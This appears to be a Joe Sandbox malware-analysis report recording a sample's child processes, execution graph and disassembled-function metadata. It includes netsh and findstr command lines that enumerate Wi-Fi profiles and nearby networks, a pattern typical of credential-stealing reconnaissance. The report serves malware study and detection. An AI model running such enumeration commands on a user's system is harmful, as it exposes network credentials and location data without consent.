                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x1360000
                                                                                                                                                            File size:12800 bytes
                                                                                                                                                            MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                            File size:82944 bytes
                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:findstr All
                                                                                                                                                            Imagebase:0xc20000
                                                                                                                                                            File size:29696 bytes
                                                                                                                                                            MD5 hash:8B534A7FC0630DE41BB1F98C882C19EC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            General

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:21:21:34
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                            File size:232960 bytes
                                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:21:21:35
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6da640000
                                                                                                                                                            File size:625664 bytes
                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:21:21:35
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:chcp 65001
                                                                                                                                                            Imagebase:0x1360000
                                                                                                                                                            File size:12800 bytes
                                                                                                                                                            MD5 hash:561054CF9C4B2897E80D7E7D9027FED9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:21:21:35
                                                                                                                                                            Start date:23/06/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                            File size:82944 bytes
                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:17.5%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:137
                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                              execution_graph 25593 3297b98 25594 3297bba LdrInitializeThunk 25593->25594 25596 3297bf4 25594->25596 25438 3254220 25439 325423e 25438->25439 25442 3253d5c 25439->25442 25441 3254275 25444 3255d40 LoadLibraryA 25442->25444 25445 3255e39 25444->25445 25446 329c4a0 25447 329c4e6 KiUserCallbackDispatcher 25446->25447 25449 329c539 25447->25449 25450 32505c8 25451 32505e2 25450->25451 25455 325fc86 25451->25455 25469 325fc29 25451->25469 25452 3250634 25456 325fc91 25455->25456 25457 325fca2 25456->25457 25483 3290848 25456->25483 25491 32908f6 25456->25491 25499 3290895 25456->25499 25507 32908b2 25456->25507 25515 3290913 25456->25515 25523 3290930 25456->25523 25531 3290878 25456->25531 25539 3290838 25456->25539 25548 3290963 25456->25548 25556 3290980 25456->25556 25564 32908cf 25456->25564 25457->25452 25470 325fc57 25469->25470 25471 3290848 5 API calls 25470->25471 25472 32908cf 5 API calls 25470->25472 25473 3290980 5 API calls 25470->25473 25474 3290963 5 API calls 25470->25474 25475 3290838 5 API calls 25470->25475 25476 3290878 5 API calls 25470->25476 25477 325fca2 25470->25477 25478 3290930 5 API calls 25470->25478 25479 3290913 5 API calls 25470->25479 25480 32908b2 5 API calls 25470->25480 25481 3290895 5 API calls 25470->25481 25482 32908f6 5 API calls 25470->25482 25471->25477 25472->25477 25473->25477 25474->25477 25475->25477 25476->25477 25477->25452 25478->25477 25479->25477 25480->25477 25481->25477 25482->25477 25484 329086e 25483->25484 25572 3297a30 25484->25572 25576 3297a20 25484->25576 25580 3297b38 25484->25580 25585 3297af4 25484->25585 25589 3297ae2 25484->25589 25485 329099b 25485->25457 25492 32908fb 25491->25492 25494 3297b38 KiUserExceptionDispatcher 25492->25494 25495 3297a20 KiUserExceptionDispatcher 25492->25495 25496 3297a30 KiUserExceptionDispatcher 25492->25496 25497 3297ae2 KiUserExceptionDispatcher 25492->25497 25498 3297af4 KiUserExceptionDispatcher 25492->25498 25493 329099b 25493->25457 25494->25493 25495->25493 25496->25493 25497->25493 25498->25493 25500 329089a 25499->25500 25502 3297b38 KiUserExceptionDispatcher 25500->25502 25503 3297a20 KiUserExceptionDispatcher 25500->25503 25504 3297a30 KiUserExceptionDispatcher 25500->25504 25505 3297ae2 KiUserExceptionDispatcher 25500->25505 25506 3297af4 KiUserExceptionDispatcher 25500->25506 25501 329099b 25501->25457 25502->25501 25503->25501 25504->25501 25505->25501 25506->25501 25508 32908b7 25507->25508 25510 3297b38 KiUserExceptionDispatcher 25508->25510 25511 3297a20 KiUserExceptionDispatcher 25508->25511 25512 3297a30 KiUserExceptionDispatcher 25508->25512 25513 3297ae2 KiUserExceptionDispatcher 25508->25513 25514 3297af4 KiUserExceptionDispatcher 25508->25514 25509 329099b 25509->25457 25510->25509 25511->25509 25512->25509 25513->25509 25514->25509 25516 3290918 25515->25516 25518 3297b38 KiUserExceptionDispatcher 25516->25518 25519 3297a20 KiUserExceptionDispatcher 25516->25519 25520 3297a30 KiUserExceptionDispatcher 25516->25520 25521 3297ae2 KiUserExceptionDispatcher 25516->25521 25522 3297af4 KiUserExceptionDispatcher 25516->25522 25517 329099b 25517->25457 25518->25517 25519->25517 25520->25517 25521->25517 25522->25517 25524 3290935 25523->25524 25526 3297b38 KiUserExceptionDispatcher 25524->25526 25527 3297a20 KiUserExceptionDispatcher 25524->25527 25528 3297a30 KiUserExceptionDispatcher 25524->25528 25529 3297ae2 KiUserExceptionDispatcher 25524->25529 25530 3297af4 KiUserExceptionDispatcher 25524->25530 25525 329099b 25525->25457 25526->25525 25527->25525 25528->25525 25529->25525 25530->25525 25532 329087d 25531->25532 25534 3297b38 KiUserExceptionDispatcher 25532->25534 25535 3297a20 KiUserExceptionDispatcher 25532->25535 25536 3297a30 KiUserExceptionDispatcher 25532->25536 25537 3297ae2 KiUserExceptionDispatcher 25532->25537 25538 3297af4 KiUserExceptionDispatcher 25532->25538 25533 329099b 25533->25457 25534->25533 25535->25533 25536->25533 25537->25533 25538->25533 25540 32907cf 25539->25540 25541 3290847 25539->25541 25543 3297b38 KiUserExceptionDispatcher 25541->25543 25544 3297a20 KiUserExceptionDispatcher 25541->25544 25545 3297a30 KiUserExceptionDispatcher 25541->25545 25546 3297ae2 KiUserExceptionDispatcher 25541->25546 25547 3297af4 KiUserExceptionDispatcher 25541->25547 25542 329099b 25542->25457 25543->25542 25544->25542 25545->25542 25546->25542 25547->25542 25549 3290968 25548->25549 25551 3297b38 KiUserExceptionDispatcher 25549->25551 25552 3297a20 KiUserExceptionDispatcher 25549->25552 25553 3297a30 KiUserExceptionDispatcher 25549->25553 25554 3297ae2 KiUserExceptionDispatcher 25549->25554 25555 3297af4 KiUserExceptionDispatcher 25549->25555 25550 329099b 25550->25457 25551->25550 25552->25550 25553->25550 25554->25550 25555->25550 25557 3290985 25556->25557 25559 3297b38 KiUserExceptionDispatcher 25557->25559 25560 3297a20 KiUserExceptionDispatcher 25557->25560 25561 3297a30 KiUserExceptionDispatcher 25557->25561 25562 3297ae2 KiUserExceptionDispatcher 25557->25562 25563 3297af4 KiUserExceptionDispatcher 25557->25563 25558 329099b 25558->25457 25559->25558 25560->25558 25561->25558 25562->25558 25563->25558 25565 32908d4 25564->25565 25567 3297b38 KiUserExceptionDispatcher 25565->25567 25568 3297a20 KiUserExceptionDispatcher 25565->25568 25569 3297a30 KiUserExceptionDispatcher 25565->25569 25570 3297ae2 KiUserExceptionDispatcher 25565->25570 25571 3297af4 KiUserExceptionDispatcher 25565->25571 25566 329099b 25566->25457 25567->25566 25568->25566 25569->25566 25570->25566 25571->25566 25574 3297a53 25572->25574 25573 3297afa KiUserExceptionDispatcher 25573->25574 25574->25573 25575 3297b0d 25574->25575 25575->25485 25579 3297a28 25576->25579 25577 3297b0d 25577->25485 25578 3297afa KiUserExceptionDispatcher 25578->25579 25579->25577 25579->25578 25581 3297a8e 25580->25581 25584 3297b47 25580->25584 25582 3297afa KiUserExceptionDispatcher 25581->25582 25583 3297b0d 25581->25583 25582->25581 25583->25485 25584->25485 25586 3297af5 25585->25586 25587 3297afa KiUserExceptionDispatcher 25586->25587 25588 3297b0d 25586->25588 25587->25586 25588->25485 25590 3297af5 25589->25590 25591 3297b0d 25590->25591 25592 3297afa KiUserExceptionDispatcher 25590->25592 25591->25485 25592->25590

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 0325CB38 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 196 325cb38-325cb53 197 325cd85-325cdad 196->197 198 325cb59-325cb60 196->198 213 325cdb4-325cdcc 197->213 199 325cb62-325cb6b 198->199 200 325cb6c-325cb8b 198->200 202 325cb91-325cbb2 200->202 203 325cd78-325cd84 200->203 204 325cbb4-325cbb8 202->204 205 325cbba-325cbe8 202->205 204->205 207 325cbea 204->207 209 325cbed-325cc73 call 325bd70 205->209 207->209 269 325cc75 call 325cdd0 209->269 270 325cc75 call 325cf12 209->270 271 325cc75 call 325cb38 209->271 217 325cdce-325ce15 213->217 218 325ce19-325cecc 213->218 217->218 238 325ced5-325cf20 218->238 239 325cece-325ced4 218->239 226 325cc7b-325cc89 call 325c280 230 325cce8-325ccec 226->230 231 325cc8b-325cc8d 226->231 233 325cd2f-325cd36 230->233 234 325ccee-325ccfb 230->234 235 325ccd1-325cce0 231->235 236 325cd38-325cd3f 233->236 237 325cd4a-325cd4e 233->237 241 325ccfd-325cd02 234->241 242 325cd0f-325cd21 234->242 235->230 240 325cce2 235->240 236->237 243 325cd41 236->243 246 325cd70-325cd75 237->246 247 325cd50-325cd57 237->247 260 325cf22 238->260 261 325cf2a-325cf2e 238->261 239->238 244 325cce4-325cce6 240->244 245 325cc8f-325cc9b 240->245 241->242 248 325cd04-325cd0d 241->248 242->246 254 325cd23-325cd2d 242->254 243->237 244->230 244->245 245->213 249 325cca1-325ccd0 245->249 246->203 247->246 252 325cd59-325cd6f 247->252 248->246 249->235 254->246 260->261 263 325cf30-325cf3c 261->263 264 325cf4a 261->264 265 325cf44 263->265 266 325cf3e-325cf41 263->266 268 325cf4b 264->268 265->264 266->265 268->268 269->226 270->226 271->226
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: <q
                                                                                                                                                              • API String ID: 0-3838347278
                                                                                                                                                              • Opcode ID: 13a382bbe7f4d484a0415389c0a3b6031e14d4bd23bb7e1814e8e33d12438883
                                                                                                                                                              • Instruction ID: 6ef4949e7a9edb33ca46a00df9a884e6081d3c6f1c4dc7a8b7a10465009b3027
                                                                                                                                                              • Opcode Fuzzy Hash: 13a382bbe7f4d484a0415389c0a3b6031e14d4bd23bb7e1814e8e33d12438883
                                                                                                                                                              • Instruction Fuzzy Hash: 98D16D74E10219CFCB14DFA8C484AAEFBF6FF48314F14815AE815AB355DB74A986CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03297B98 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 920 3297b98-3297bed LdrInitializeThunk 924 3297bf4-3297bfb 920->924 925 3297bfd-3297c31 924->925 926 3297c43-3297c5c 924->926 925->926 935 3297c33-3297c3d 925->935 928 3297c5e 926->928 929 3297c67 926->929 928->929 931 3297c68 929->931 931->931 935->926
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 21dd2ecab99aed19258a9539acc0404cf7c4eb5df37727567b241c6062f31e5d
                                                                                                                                                              • Instruction ID: 085694b7e45d873cb9a17da65681044e2e145f5cc4cf86363e6b1f2fe507050b
                                                                                                                                                              • Opcode Fuzzy Hash: 21dd2ecab99aed19258a9539acc0404cf7c4eb5df37727567b241c6062f31e5d
                                                                                                                                                              • Instruction Fuzzy Hash: 2F214A30B10215CFDB18DB78D5586AE76F7EB88740F204179C506EB3A4DE7A9D82CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03258D58 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 53337f5d59e152346f79fdcc051b65064c48a5136f895ce2e3559d7c2add0168
                                                                                                                                                              • Instruction ID: 9cb8cd5c66a1269d9b86f224296f294d5a10081de6835bd6fdf87b425d75bc4c
                                                                                                                                                              • Opcode Fuzzy Hash: 53337f5d59e152346f79fdcc051b65064c48a5136f895ce2e3559d7c2add0168
                                                                                                                                                              • Instruction Fuzzy Hash: 98B15E71E1020ACFDB10CFA9C8857ADFBF2AF88314F588529F819E7254DB749985CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03259628 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 050c67cbae734924032b1a3b38b7aef3f65d68d428161156ff1ad4401c7ad550
                                                                                                                                                              • Instruction ID: cc19e44d9a7232a1c49804efe5e8a2d7a55b059a3fc78545f879bdd870729f6d
                                                                                                                                                              • Opcode Fuzzy Hash: 050c67cbae734924032b1a3b38b7aef3f65d68d428161156ff1ad4401c7ad550
                                                                                                                                                              • Instruction Fuzzy Hash: E3B15070E1020ACFDB10CFA9D98579DBBF2AF88354F188129E815EB254DB7499C5CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03253D5C Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 157 3253d5c-3255d97 159 3255d99-3255dbe 157->159 160 3255deb-3255e37 LoadLibraryA 157->160 159->160 165 3255dc0-3255dc2 159->165 163 3255e40-3255e71 160->163 164 3255e39-3255e3f 160->164 170 3255e81 163->170 171 3255e73-3255e77 163->171 164->163 167 3255de5-3255de8 165->167 168 3255dc4-3255dce 165->168 167->160 172 3255dd0 168->172 173 3255dd2-3255de1 168->173 176 3255e82 170->176 171->170 174 3255e79 171->174 172->173 173->173 175 3255de3 173->175 174->170 175->167 176->176
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: e034ba1eb63082123763a5e73d769990cede29dbcf3771152af2bffebbdf3384
                                                                                                                                                              • Instruction ID: b12a9e62cb9330be8a5586c779a6933ce9e5b726f5d29c953435f8dc47ad4ebd
                                                                                                                                                              • Opcode Fuzzy Hash: e034ba1eb63082123763a5e73d769990cede29dbcf3771152af2bffebbdf3384
                                                                                                                                                              • Instruction Fuzzy Hash: 424148B1D202198FDB10CFA9D88479EBBF5EB49310F248129E816EB384D7789985CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03255D36 Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 177 3255d36-3255d97 178 3255d99-3255dbe 177->178 179 3255deb-3255e37 LoadLibraryA 177->179 178->179 184 3255dc0-3255dc2 178->184 182 3255e40-3255e71 179->182 183 3255e39-3255e3f 179->183 189 3255e81 182->189 190 3255e73-3255e77 182->190 183->182 186 3255de5-3255de8 184->186 187 3255dc4-3255dce 184->187 186->179 191 3255dd0 187->191 192 3255dd2-3255de1 187->192 195 3255e82 189->195 190->189 193 3255e79 190->193 191->192 192->192 194 3255de3 192->194 193->189 194->186 195->195
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: f923270cfb8721a62cb471f0f15f79a1e470a757761906cc8ac0476f6a1ac061
                                                                                                                                                              • Instruction ID: 21b1220914fa145307b231b520bf2539e8acc8778d69e16ad6f5167921cfdd85
                                                                                                                                                              • Opcode Fuzzy Hash: f923270cfb8721a62cb471f0f15f79a1e470a757761906cc8ac0476f6a1ac061
                                                                                                                                                              • Instruction Fuzzy Hash: F44157B1D102098FDB10CFA9D88479DFBF1EB49310F24812AE816EB384D7789985CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03297B88 Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 893 3297b88-3297bd3 897 3297bda-3297bed LdrInitializeThunk 893->897 898 3297bf4-3297bfb 897->898 899 3297bfd-3297c31 898->899 900 3297c43-3297c5c 898->900 899->900 909 3297c33-3297c3d 899->909 902 3297c5e 900->902 903 3297c67 900->903 902->903 905 3297c68 903->905 905->905 909->900
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 03f8dfe11a1639e557558e220e2c159d7bf56d6bc320ea5fe991b17b8734649c
                                                                                                                                                              • Instruction ID: 932e3492782af7fb3443321d9264d7ed1a11395c3334f9e5adcc70d8ac740d4f
                                                                                                                                                              • Opcode Fuzzy Hash: 03f8dfe11a1639e557558e220e2c159d7bf56d6bc320ea5fe991b17b8734649c
                                                                                                                                                              • Instruction Fuzzy Hash: E0213030710215CFDB15DB78D59466E77F2EB88740F204169D506EB3A4DE799D41CBD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0329C480 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 911 329c480-329c4f4 915 329c4ff-329c537 KiUserCallbackDispatcher 911->915 916 329c539-329c53f 915->916 917 329c540-329c566 915->917 916->917
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0329C523
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: fe30c844f0bc7da271f8a59754eda1519b96574add2fee4c8c2fc9873faab229
                                                                                                                                                              • Instruction ID: 1ce61e10d27a1e478d5ed1762ae8b307b6dbece2c68020cfe169066d4769ce38
                                                                                                                                                              • Opcode Fuzzy Hash: fe30c844f0bc7da271f8a59754eda1519b96574add2fee4c8c2fc9873faab229
                                                                                                                                                              • Instruction Fuzzy Hash: EF21697080939ACFDB01CFA9E9456EEBFB4AF09210F18449AE455B7282D7386944CFA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0329C4A0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 937 329c4a0-329c537 KiUserCallbackDispatcher 941 329c539-329c53f 937->941 942 329c540-329c566 937->942 941->942
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0329C523
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: a3311028fdeb77d6d755a895598f029146b48737d3ba4c73d9f6d07d3189e8f0
                                                                                                                                                              • Instruction ID: e992125e762158da39ae780e8a0d67818438b6021c8b3f01a0cc988a6491074c
                                                                                                                                                              • Opcode Fuzzy Hash: a3311028fdeb77d6d755a895598f029146b48737d3ba4c73d9f6d07d3189e8f0
                                                                                                                                                              • Instruction Fuzzy Hash: 612125B0D1025ACFDB40CF9AE5446EEBBF4BB48320F14841AE419B7380D778A944CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03297AE2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 945 3297ae2-3297aea 946 3297b08-3297b0b 945->946 947 3297b0d-3297b14 946->947 948 3297af5-3297af8 946->948 949 3297b2b-3297b31 947->949 950 3297b16 947->950 951 3297afa-3297b07 KiUserExceptionDispatcher 948->951 952 3297b21-3297b26 948->952 954 3297b1f 950->954 951->946 952->949 954->949
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 03297B01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 6842923-0
                                                                                                                                                              • Opcode ID: ddbd1c02eab314fe69d49840f59f04653738df4521aec565a9cc8e6748bd5d85
                                                                                                                                                              • Instruction ID: 2f96f8b79469cef0c59a6ea5e4a73e1f8ce902c24b7e8b2710eed38ec625e5c3
                                                                                                                                                              • Opcode Fuzzy Hash: ddbd1c02eab314fe69d49840f59f04653738df4521aec565a9cc8e6748bd5d85
                                                                                                                                                              • Instruction Fuzzy Hash: 5EE06D36931525CBDF12DBACE8A56ADF735FBA8711F014162D81253140CB717CA2CBD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03297AF4 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 955 3297af4 956 3297af5-3297af8 955->956 957 3297afa-3297b0b KiUserExceptionDispatcher 956->957 958 3297b21-3297b26 956->958 957->956 961 3297b0d-3297b14 957->961 962 3297b2b-3297b31 958->962 961->962 963 3297b16 961->963 964 3297b1f 963->964 964->962
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 03297B01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
